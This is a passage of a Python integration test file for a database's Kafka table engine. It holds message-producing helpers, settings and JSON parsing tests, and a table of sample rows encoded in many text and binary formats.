for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
assert timestamp == 0 or message.timestamp / 1000 == timestamp
if needDecode:
yield message.value.decode()
else:
yield message.value
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n')
SETTINGS kafka_commit_on_select = 1;
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_commit_on_select = 1,
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_commit_on_select = 1,
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'CustomSeparated' : {
'data_sample' : [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
},
'Template' : {
'data_sample' : [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
],
'extra_settings': ", format_template_row='template_row.format'"
},
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
